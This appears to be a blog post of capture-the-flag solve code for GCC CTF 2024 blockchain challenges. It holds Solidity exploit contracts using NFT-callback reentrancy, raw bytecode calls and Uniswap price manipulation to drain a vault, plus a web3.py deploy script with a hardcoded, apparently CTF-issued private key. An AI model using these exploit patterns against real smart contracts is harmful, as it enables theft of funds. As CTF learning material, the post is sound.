<-->

https://ctftime.org/event/2251

 

GCC CTF 2024

TOP 1 : 750€ Cash, 5x 1 Month HTB Prolabs, 4x Root-me Premium + 5x 30€ shop voucher TOP 2 : 500€ Cash, 5x 1 Year HTB VIP+, 3x Root-me Premium + 5x 20€ shop voucher TOP 3 : 300€ Cash, 5x 6 Months HTB VIP, 2x Root-me Premium + 5x 10€ shop voucher

ctftime.org

 

 

 

synthatsu_katana_thief

 

contract Solve{
    Challenge public challenge;
    KatanaSale public katanaSale;
    constructor(address _challenge) {
        challenge = Challenge(_challenge);
        katanaSale = KatanaSale(challenge.katanaSale());
        katanaSale.becomeBeyond("I will check out @BeyondBZH and @gcc_ensibs on X");
        katanaSale.endSale();
        katanaSale.transfer(challenge.PLAYER(), 60);
    }
}

 

 

gcc_first_drop

 

contract Solve {
    Challenge public challenge;
    BeyondNFT public beyondNFT;
    AboveNFT  public aboveNFT;
    uint public num = 0;
    constructor (address _challenge) payable {
        challenge = Challenge(_challenge);
        beyondNFT = BeyondNFT(challenge.beyond());
        beyondNFT.mint{value: 1 ether}();
        aboveNFT = AboveNFT(challenge.above());
    }

    function execute() public {
        beyondNFT.claimSpecialPrize();
        for(uint i = 1; i < 7; i++) {
            aboveNFT.transferFrom(address(this), challenge.PLAYER(), i);
        }
    }

    function onERC721Received(address to, address to2, uint256 tokenId, bytes calldata data) public returns (bytes4) {
        if (num < 7) {
            num++;
            beyondNFT.claimSpecialPrize();
        }
        return this.onERC721Received.selector;
    }
}

 

 

ode

 

contract Solve {
    Challenge public challenge = Challenge(0xD3dFB133C651DA0948F1D35464F459CCcd7d42B2);
    address public target = challenge.target(); 
    constructor() payable {}

    function step1() public payable{
        bytes memory data = abi.encode(uint256(uint160(address(this))));
        (bool su, bytes memory g) = address(challenge.target()).call(data);
        require(su == true);
        bytes memory data2 = hex'5f6060565b608060405260258060726000396000f3fe7f0000000000000000576861742061626f7574203078356320262030783562203f60005500';
        (su, g) = address(challenge.target()).call{value: 59}(data2);
        require(su == true);
    }

    function step2() public payable{
        bytes memory data = abi.encode(uint256(uint160(address(this)) + 1));
        (bool su, bytes memory g) = address(challenge.target()).call(data);
        require(su == true);
    }
}

 

 

tootb

 

curl -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"anvil_setBalance","params":["0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85", "20000000000000000000000000000000"],"id":84}' http://worker03.gcc-ctf.com:11560/rpc

 

 

gcc_pincer

 

contract Solve {
    IUniswapV2Router02 public immutable uniswapRouter = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
    address public immutable WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address public immutable MINAMINAO = 0x710ACb69aCa6aD658633A50D5e0CFFA52Dc7Bf07;
    address public immutable PLAYER = 0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85;
    Beyond public beyond;
    Vault public vault;
    Challenge public challenge;

    uint public before_vault_weth;
    uint public before_vault_beyond;
    uint public after_vault_weth;
    uint public after_vault_beyond;

    constructor (address _challenge) payable{
        challenge = Challenge(_challenge);
        beyond = challenge.beyond();
        vault = challenge.vault();

        before_vault_weth = IERC20(WETH).balanceOf(address(vault));
        before_vault_beyond = IERC20(beyond).balanceOf(address(vault));
    }

    function estimateAmountOut(uint256 amountIn, address[] memory path) external view returns(uint256) {
        uint256[] memory amounts = uniswapRouter.getAmountsOut(amountIn, path); //// ?
        return amounts[1] - (amounts[1] * 5 / 1000);
    }

    function step1() public {
        IWETH(WETH).deposit{value : 490 ether}();
        IERC20(WETH).approve(address(uniswapRouter), type(uint256).max);
        IERC20(WETH).approve(address(beyond), type(uint256).max);
        IERC20(beyond).approve(address(uniswapRouter), type(uint256).max);
        IERC20(beyond).approve(address(beyond), type(uint256).max);
        
        beyond.buy(350 ether);



        address[] memory path = new address[](2);
        path[1] = WETH;
        path[0] = address(beyond);
        uniswapRouter.swapExactTokensForTokens(350 ether, this.estimateAmountOut(350 ether, path), path, address(this), block.timestamp);
    }

    function step2() public {
        
        after_vault_weth = IERC20(WETH).balanceOf(address(vault));
        after_vault_beyond = IERC20(beyond).balanceOf(address(vault));

        address[] memory path = new address[](2);
        path[0] = WETH;
        path[1] = address(beyond);
        uniswapRouter.swapExactTokensForTokens(140 ether, this.estimateAmountOut(140 ether, path), path, address(this), block.timestamp);
    }
}

 

 

 

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://worker02.gcc-ctf.com:13141/rpc"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0x6715d324d14e0565ab02a575fa5f74540719ba065a610cba6497cdbf22cd5cdb'
challenge_addr = "0x8E4Dc4233Fe0c90674924c0f5b94A78F60fe0D29"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

f = open("att.abi", "r"); contract_abi= f.read(); f.close()
f = open("att.bin", "r"); contract_bytecode= f.read(); f.close()

contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
transaction = contract.constructor(challenge_addr).build_transaction(
    {
        "chainId": w3.eth.chain_id,
        "gasPrice": w3.eth.gas_price,
        "from": Public_Address,
        "nonce": w3.eth.get_transaction_count(Public_Address),
        "value": 490 * 10**18 
        # "value": 0 
    }
)
sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
print("Deploying Contract!")
# Send the transaction
transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
# Wait for the transaction to be mined, and get the transaction receipt
print("Waiting for transaction to finish...")
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print(transaction_receipt)
print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")

cont_addr = transaction_receipt.contractAddress
contract = w3.eth.contract(address=cont_addr, abi=contract_abi, bytecode=contract_bytecode)
print(contract.functions["before_vault_weth"]().call()//10**18)
print(contract.functions["before_vault_beyond"]().call()//10**18)

func_call = contract.functions["step1"]().build_transaction({
    "from": myAddr,
    "nonce": w3.eth.get_transaction_count(myAddr),
    "gasPrice": w3.eth.gas_price,
    "chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)


time.sleep(120)


func_call = contract.functions["step2"]().build_transaction({
    "from": myAddr,
    "nonce": w3.eth.get_transaction_count(myAddr),
    "gasPrice": w3.eth.gas_price,
    "chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)

print(contract.functions["after_vault_weth"]().call()//10**18)
print(contract.functions["after_vault_beyond"]().call()//10**18)

 

'writeups' 카테고리의 다른 글

Dreamhack Invitational Quals  (0) 2024.05.03
osu!gaming 2024 - blockchain  (0) 2024.03.04
LACTF 2024 - zerocoin, remi-s world  (0) 2024.02.19
DiceCTF 2024 Quals - floordrop(blockchain)  (0) 2024.02.05
RealWorldCTF 2024 - blockchain(safebridge)  (0) 2024.01.28

+ Recent posts

티스토리툴바